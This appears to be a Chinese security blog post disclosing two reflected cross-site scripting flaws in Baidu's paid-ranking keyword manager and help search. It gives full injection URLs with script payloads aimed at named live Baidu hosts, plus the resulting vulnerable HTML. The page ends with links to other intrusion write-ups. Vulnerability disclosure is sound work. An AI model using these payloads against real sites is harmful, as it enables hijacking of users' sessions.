|
[组图]百度竞价排名多处XSS漏洞
今天内容比较平淡,都是普通的XSS。
竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。
访问地址是: http://www2.baidu.com
但是这个系统和其他核心模块比起来,安全性要差上很多。
糟糕的验证码设计暂且不说,XSS方面几乎没有防范。
今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺。
类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。
XSS 9: 百度竞价排名管理关键字 XSS 漏洞
漏洞链接如下:
| 以下是引用片段: http://www2.baidu.com/query/query_mgr.php?gid=A&tp=A&pe=20&ob=status&sb=keyword&uid=1019083&sw=“><script>alert(/Keyword+XSS/)</script><”&cp=1&submit=1 |
代码如下:
| 以下是引用片段: <form name=choice action=”" method=post><td align=center> <select name=gid ><option value=”0″>我的关键字</option> <option value=”A” selected>所有关键字组别</option> </select> …… <input name=sw size=10 value=”“><script>alert(/Keyword XSS/)</script><”“> <input type=hidden name=cp value=”1″> |
XSS 10: 百度竞价排名帮助搜索XSS
| 以下是引用片段: http://sf-help.baidu.com/search?word=“><script>alert(/Search+XSS/);</script><” |
| 以下是引用片段: <form action=’/search’ method=’GET’ style=”margin:0px;padding:0px;”> <div class=”tit_2″><strong>帮助搜索</strong></div> <div class=”box_2″> <input name=”word” type=”text” size=”19″ id=”s” value=”\”><script>alert(/Search XSS/);</script><\”“> <input type=”submit” name=”Submit” value=”搜索”> </div> </form> |
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: